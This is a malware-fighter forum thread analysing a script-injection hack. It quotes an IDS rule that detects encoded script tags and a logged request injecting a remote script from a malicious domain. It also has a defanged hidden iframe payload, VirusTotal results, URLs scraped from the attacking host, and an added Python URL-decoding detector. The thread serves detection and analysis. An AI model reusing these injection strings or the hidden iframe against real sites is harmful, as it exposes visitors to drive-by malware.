A 3CSCRIPT hack...

Hi malware fighters,

Look here at how it was performed: http://www.webhostingtalk.com/showthread.php?t=626444
I give this in at Google:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:" tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://www.google.com/search?client=flock&channel=fds&q=<script+src%3Dhttp%3A%2F%2Fexport.webservicessl.ru%2Fjs.js>&ie=utf-8&oe=utf-8&aq=t

What is this js.js malware? See: http://www.google.com/safebrowsing/diagnostic?site=http%3A//export.webservicessl.ru/js.js
See: http://jsunpack.jeek.org/dec/go?report=f657a77d0501a9cb52516346fd69dfcc8da15ccb
You get this here:

^iframe src=htxp://letter.kafeira.com:8080/index.php?pid=6 width=0 height=0 frameborder=0^^/iframe>")}catch(e){}}= "error code to get an SQL" pol 

Expired site now used for malicious purposes:
kafeiracom - wXw.kafeiracom

Malware folks, more and more malware…

polonus
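The rule quoted in the post looks for "%3CSCRIPT" in the URL, while the logged request carries a literal "<script" with only "=" and ":" percent-encoded. As an added example (not from the post, the forum or any IDS product), here is a small Python check that applies the rule's idea after bounded percent-decoding, so the logged form, a double-encoded variant and the verbatim encoded form are all caught and the script src is pulled out for the analyst; the function names and the URLs marked constructed are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example modelled on the quoted rule (url_content "%3CSCRIPT", nocase,
# url_re /%3Cscript.*%3E/i). Names and the constructed URLs below are ours.
RAW_ENCODED = re.compile(r"%3Cscript", re.IGNORECASE)     # what the rule matches verbatim
SCRIPT_TAG = re.compile(r"<script[^>]*>", re.IGNORECASE)  # the tag once decoded
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

def normalise_url(url: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly, bounded, so %253C -> %3C -> < is exposed too."""
    prev = url
    for _ in range(max_rounds):
        cur = unquote_plus(prev)
        if cur == prev:
            break
        prev = cur
    return prev

def inspect_url(url: str) -> dict:
    """Report whether the raw or the decoded form carries a <script> tag, and its src."""
    decoded = normalise_url(url)
    tag = SCRIPT_TAG.search(decoded)
    src = None
    if tag:
        m = SRC_ATTR.search(tag.group(0))
        src = m.group(1) if m else None
    return {
        "raw_encoded_hit": bool(RAW_ENCODED.search(url)),
        "decoded_tag_hit": tag is not None,
        "script_src": src,
    }

# The request URL quoted in the post: literal "<", only "=" and ":" encoded.
LOGGED_URL = ("http://www.google.com/search?client=flock&channel=fds"
              "&q=<script+src%3Dhttp%3A%2F%2Fexport.webservicessl.ru%2Fjs.js>"
              "&ie=utf-8&oe=utf-8&aq=t")
# Constructed: the same shape double-encoded, which a verbatim %3CSCRIPT check misses.
DOUBLE_ENCODED_URL = ("http://www.example.invalid/search?"
                      "q=%253Cscript%2520src%253Dhttp%253A%252F%252Fcdn.example.invalid%252Fa.js%253E")
# Constructed: a benign query that mentions "script" without any tag.
BENIGN_URL = "http://www.example.invalid/search?q=javascript+tutorial"

if __name__ == "__main__":
    for u in (LOGGED_URL, DOUBLE_ENCODED_URL, BENIGN_URL):
        print(inspect_url(u))
```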

VirusTotal - scriptA.txt - 1/41
http://www.virustotal.com/analisis/a18b1856f9fcd8820b88e16e7b0f5dbbbff4bc8025a815f6c50152201ee7ea37-1278518424

VirusTotal - scriptB.txt - 1/41
http://www.virustotal.com/analisis/85a64ae5a63874d17bd3f8f54dc9eddc0402148ee4ee58b1aa5db0d94e13e144-1278518442

VirusTotal - scriptC.txt - 4/41
http://www.virustotal.com/analisis/44d70cd4203d850263a1b1bf8be6ca95efc56b7d8bf3739eb1422975cba08480-1278518659

Hi Pondus,

But there are a lot of descriptions here of this kind of exploit:
http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/
http://www.techjaws.com/php-script-injection-exploit-in-wordpress-271/

Also posted by me: http://forum.avast.com/index.php?topic=45133.15

polonus

Hi malware fighters.

Here is an example of the obfuscated code of JS:Redirector-H [Trj]; see the attached gif.

polonus

Hi malware fighters,

Tested this: htxp://letter.kafeira.com:8080/index.php?

Found: htxp://letter.kafeira.com:8080/.replace(/%5BM%5C%5EKNB%5D/g, (output debug string)
htxp://letter.kafeira.com:8080/u/nvdve/fviWn/eWdt
htxp://letter.kafeira.com:8080/.replace(/%5BtvW/0%5D/g,
htxp://letter.kafeira.com:8080/.replace(/%5B%5C%3Ck%5C?p]]/g,
htxp://letter.kafeira.com:8080/.replace(/%5B%5C)TQql%5D/g, (streamhiking)
htxp://letter.kafeira.com:8080/.replace(/%5BAB%5C?X]]/g,

polonus